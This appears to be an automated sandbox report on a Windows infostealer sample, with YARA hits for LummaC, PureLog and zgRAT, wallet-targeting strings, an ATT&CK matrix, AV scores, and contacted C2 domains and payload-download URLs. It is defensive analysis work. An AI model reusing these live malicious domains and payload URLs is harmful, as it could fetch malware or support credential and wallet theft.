Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Queries volume information: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Queries volume information: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\l6E.exe	Queries volume information: C:\Users\user\AppData\Roaming\l6E.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004079F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_004079F4

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: PT54FFSL7ET46RASB.exe, 00000000.00000002.2156456071.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, l6E.exe, 00000016.00000002.2723195555.0000000001202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: PT54FFSL7ET46RASB.exe, 00000000.00000002.2156456071.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, l6E.exe, 00000016.00000002.2723195555.0000000001202000.00000004.00000020.00020000.00000000.sdmp, l6E.exe.4.dr	Binary or memory string: AVP.exe

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi\|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegAsm.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	331 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	512 Process Injection	211 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	244 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	22 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	661 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	451 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	451 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	512 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PT54FFSL7ET46RASB.exe	34%	ReversingLabs	Win32.Trojan.Generic
PT54FFSL7ET46RASB.exe	38%	Virustotal		Browse
PT54FFSL7ET46RASB.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	100%	Avira	TR/Dropper.MSIL.Gen8
C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	42%	Virustotal		Browse
C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	58%	ReversingLabs	ByteCode-MSIL.Dropper.Marsilia
C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	62%	Virustotal		Browse
C:\Users\user\AppData\Roaming\l6E.exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\l6E.exe	54%	Virustotal		Browse
C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	42%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
2x.si	16%	Virustotal	Browse
pool.hashvault.pro	7%	Virustotal	Browse
strompreis.ru	3%	Virustotal	Browse
eemmbryequo.shop	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://go.microsoft.co	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/14436606/23354	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-netJ	0%	Avira URL Cloud	safe
tryyudjasudqo.shop	100%	Avira URL Cloud	malware
reggwardssdqw.shop	100%	Avira URL Cloud	malware
https://xmrig.com/wizard%s	0%	Avira URL Cloud	safe
https://go.microsoft.co	1%	Virustotal		Browse
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Avira URL Cloud	safe
reggwardssdqw.shop	0%	Virustotal		Browse
licenseodqwmqn.shop	100%	Avira URL Cloud	malware
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://xmrig.com/wizard%s	2%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Virustotal		Browse
tryyudjasudqo.shop	0%	Virustotal		Browse
https://stackoverflow.com/q/14436606/23354	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-net	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
licenseodqwmqn.shop	0%	Virustotal		Browse
https://files.catbox.moe/kwfxr7.dll	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	2%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	0%	Virustotal		Browse
https://files.catbox.moe/kwfxr7.dll	9%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	0%	Avira URL Cloud	safe
relaxatinownio.shop	100%	Avira URL Cloud	malware
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
keennylrwmqlw.shop	100%	Avira URL Cloud	malware
https://github.com/mgravell/protobuf-neti	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://stackoverflow.com/q/2152978/23354rCannot	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/11564914/23354;	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/2152978/23354	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	0%	Virustotal		Browse
tesecuuweqo.shop	100%	Avira URL Cloud	malware
keennylrwmqlw.shop	0%	Virustotal		Browse
relaxatinownio.shop	0%	Virustotal		Browse
https://stackoverflow.com/q/2152978/23354rCannot	0%	Virustotal		Browse
https://stackoverflow.com/q/11564914/23354;	0%	Virustotal		Browse
tendencctywop.shop	100%	Avira URL Cloud	malware
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
https://eemmbryequo.shop/	100%	Avira URL Cloud	malware
tendencctywop.shop	0%	Virustotal		Browse
https://xmrig.com/benchmark/%s	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
https://2x.si/o3M.dll;	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/2152978/23354	0%	Virustotal		Browse
https://xmrig.com/docs/algorithms	2%	Virustotal		Browse
https://files.catbox.moe/k541xr.dll	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	2%	Virustotal		Browse
https://eemmbryequo.shop/api	100%	Avira URL Cloud	malware
https://2x.si/o3M.dll	0%	Avira URL Cloud	safe
eemmbryequo.shop	100%	Avira URL Cloud	malware
http://crl.micros	0%	Avira URL Cloud	safe
https://2x.si/o3M.dll	12%	Virustotal		Browse
https://eemmbryequo.shop/api	17%	Virustotal		Browse
https://eemmbryequo.shop/	12%	Virustotal		Browse
https://files.catbox.moe/k541xr.dll	10%	Virustotal		Browse
eemmbryequo.shop	0%	Virustotal		Browse
tesecuuweqo.shop	9%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
2x.si	172.67.143.156	true	false	16%, Virustotal, Browse	unknown
pool.hashvault.pro	95.179.241.203	true	true	7%, Virustotal, Browse	unknown
strompreis.ru	45.11.229.96	true	true	3%, Virustotal, Browse	unknown
eemmbryequo.shop	104.21.39.11	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
tryyudjasudqo.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
reggwardssdqw.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
licenseodqwmqn.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
relaxatinownio.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
keennylrwmqlw.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
tesecuuweqo.shop	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
tendencctywop.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://eemmbryequo.shop/api	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://2x.si/o3M.dll	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
eemmbryequo.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/14436606/23354	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194703677.000002EACED41000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2247370156.0000010E00001000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880001000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D261000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D386000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-netJ	yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D87C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.microsoft.co	powershell.exe, 00000006.00000002.2393761070.00000185CA497000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://files.catbox.moe/kwfxr7.dll	aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880131000.00000004.00000800.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354rCannot	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
